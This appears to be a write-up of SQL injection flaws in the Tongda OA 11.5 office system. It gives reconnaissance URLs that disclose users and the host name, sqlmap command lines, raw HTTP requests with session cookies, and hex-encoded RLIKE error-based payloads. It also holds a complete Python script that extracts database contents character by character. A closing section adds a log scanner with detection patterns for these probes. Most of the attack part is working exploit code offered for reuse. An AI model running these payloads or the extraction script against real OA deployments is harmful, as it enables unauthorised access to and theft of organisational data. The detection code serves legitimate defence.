Vulnerability description
Tongda OA 11.5 contains SQL injection vulnerabilities.
Affected versions
Tongda OA 11.5
Determining the Tongda OA version:
http[s]://TongDaOA.domain/inc/expired.php reveals the Tongda version
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
The GET parameters username and email can be used to enumerate users and email addresses
http[s]://TongDaOA.domain/resque/worker.php reveals the computer name
Local reproduction
First download Tongda OA 11.5 from https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe
After installation, log in as admin with an empty password.
Then create an ordinary user test:test123456 and log in with the test account.
Vulnerability 1: id parameter (boolean-based and time-based blind injection)
The id parameter is injectable at /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2. Inject with sqlmap:
python sqlmap.py -u "http://192.168.43.129/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie "PHPSESSID=3v2mhf591c0jsq3kq8tba98q57; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=f4586f66; _csrf=4c3bd17849ec492e8d49a4eb7ec85dc614f22fb1195264aee25c341f17953e2da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22g-FcCpSREk0gavd50I0nIYzAhtkCzRrg%22%3B%7D" --batch --is-dba
Vulnerability 2: starttime parameter (time-based blind injection)
Prerequisite: a logged-in ordinary account, although testing showed that some older versions can be injected without logging in.
Location: /general/appbuilder/web/calendar/calendarlist/getcallist
Request:
GET /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 192.168.43.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=hdjbtbc1p2qr9tav02th3ebqu7; USER_NAME_COOKIE=test1; OA_USER_ID=65; SID_65=e6f0418; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D; SID_1=df1aabe7
Upgrade-Insecure-Requests: 1

starttime=1&endtime=1598918400&view=month&condition=1
Test with sqlmap: python sqlmap.py -r .\test.txt --batch --dbs
Vulnerability 3: orderby parameter
Prerequisite: a logged-in ordinary account, although testing showed that some older versions can be injected without logging in.
Location one: /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=&timestamp=1598069103&total=
Location two: /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=&timestamp=1598069103&total=
RLIKE() error-based injection is used here; RLIKE() is a synonym for REGEXP_LIKE(). RLIKE raises an error when it meets the special characters ( and ), so when the expression is true it outputs 1 and the page renders normally, and when the expression is false it outputs the special character and the query errors out. Single quotes are filtered here as well, so hexadecimal is used to get around the filter: ( is 0x28.
Test statements:
3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) # 1=1 is true, outputs 1, normal response
3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END)) # 1=2 is false, outputs 0x28, which is a special character and raises an error
1=1: normal response
1=2: outputs the special character 0x28, error
I wrote a script to automate the injection:
import sys
import urllib.parse

import requests

url = 'http://192.168.43.129/general/email/inbox/get_index_data.php'
cookies = "USER_NAME_COOKIE=test1; SID_65=569f697c; SID_1=df1aabe7; PHPSESSID=e4kdfoeb9r9gc5v486uno0nm15; OA_USER_ID=65; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D"
sql = '(select database())'  # expression whose result is recovered one character at a time
flag = ''
for i in range(1, 50):
    # binary search over the printable ASCII range for the i-th character
    high = 132
    low = 32
    mid = (high+low)//2
    while high > low:
        headers = {
            "cookie": urllib.parse.unquote(cookies)
        }
        target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
                       "WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
                       "END))&pagelimit=10&tag=&timestamp=1598069103&total= ".format(sql, i, hex(mid))
        # print(target)
        s = requests.get(url=target, headers=headers)
        # print(s.text)
        if 'timestamp' in s.text:
            # normal response: the condition held, so the character is >= mid
            low = mid+1
        else:
            # RLIKE error: the condition failed, so the character is < mid
            high = mid
        mid = (high+low)//2
    if mid == 33 or mid == 132:
        # end of the string has been reached
        sys.exit(0)
    flag += chr(mid-1)
    print("[+] "+flag)
The user is rOOt@::1
The database is tDzOA
Vulnerability 4: SORT_ID and FILE_SORT parameters
Prerequisite: no login required on version 11.5
Location: /general/file_folder/swfupload_new.php
Parameters: SORT_ID, FILE_SORT
Request:
POST /general/file_folder/swfupload_new.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
X-Resource-Type: xhr
Connection: close
Host: 192.168.77.137
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 433
x-wvs-id: Acunetix-Deepscan/186
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
------------GFioQpMK0vv2--
Reproduction failed here.
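As an added defensive example that is not part of this write-up, the check below scans web-server access log lines for the four endpoints listed above and flags the watched parameters when they stop being plain integers and carry the RLIKE / CASE WHEN / hex-literal markers described for the error-based technique. The endpoint and parameter names come from this page; the log format and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the write-up and the parameters reported as injectable;
# in normal use all of them carry plain integers (id=2, orderby=3, ...).
WATCHED = {
    "/general/appbuilder/web/report/repdetail/edit": {"id"},
    "/general/appbuilder/web/calendar/calendarlist/getcallist": {"starttime"},
    "/general/email/inbox/get_index_data.php": {"orderby"},
    "/general/file_folder/swfupload_new.php": {"SORT_ID", "FILE_SORT"},
}
# Markers of the RLIKE / CASE WHEN error-based probe and the hex literal that
# stands in for the filtered single quote, as in the write-up's test statements.
MARKERS = re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b|\bSELECT\b|\b0x[0-9a-f]{2,}\b", re.I)
# Combined-format access log (assumed): client, timestamp, "METHOD target HTTP/x", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

def suspicious_params(target):
    """Return {param: decoded value} for watched parameters that look injected."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if not watched:
        return {}
    hits = {}
    for name in watched:
        for value in parse_qs(parts.query, keep_blank_values=True).get(name, []):
            # An integer, or empty as in the second orderby URL above, is the
            # benign shape; anything else that carries an SQL marker is flagged.
            if not value.isdigit() and MARKERS.search(value):
                hits[name] = value
    return hits

def scan_log(lines):
    """Yield (client, timestamp, param, value) per suspicious GET request.
    SORT_ID/FILE_SORT travel in a multipart POST body, which an access log
    does not record; that case needs a WAF or full-request log instead."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, when, _method, target, _status = m.groups()
            for name, value in suspicious_params(target).items():
                yield client, when, name, value

# Constructed sample log lines (not taken from the write-up's environment).
SAMPLE_LOG = [
    '10.0.0.7 - - [25/Aug/2020:10:05:03 +0800] "GET /general/email/inbox/get_index_data.php?asc=0&orderby=3&pagelimit=10 HTTP/1.1" 200 512',
    '10.0.0.7 - - [25/Aug/2020:10:05:09 +0800] "GET /general/email/inbox/get_index_data.php?asc=0&orderby=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%200x28%20END))&pagelimit=10 HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Aug/2020:10:06:00 +0800] "GET /general/appbuilder/web/calendar/calendarlist/getcallist?starttime=1&endtime=1598918400&view=month HTTP/1.1" 200 88',
]
```

Running `list(scan_log(SAMPLE_LOG))` reports only the second line, on the orderby parameter; the request with a 200 status shows why a status-code filter alone would miss the probe.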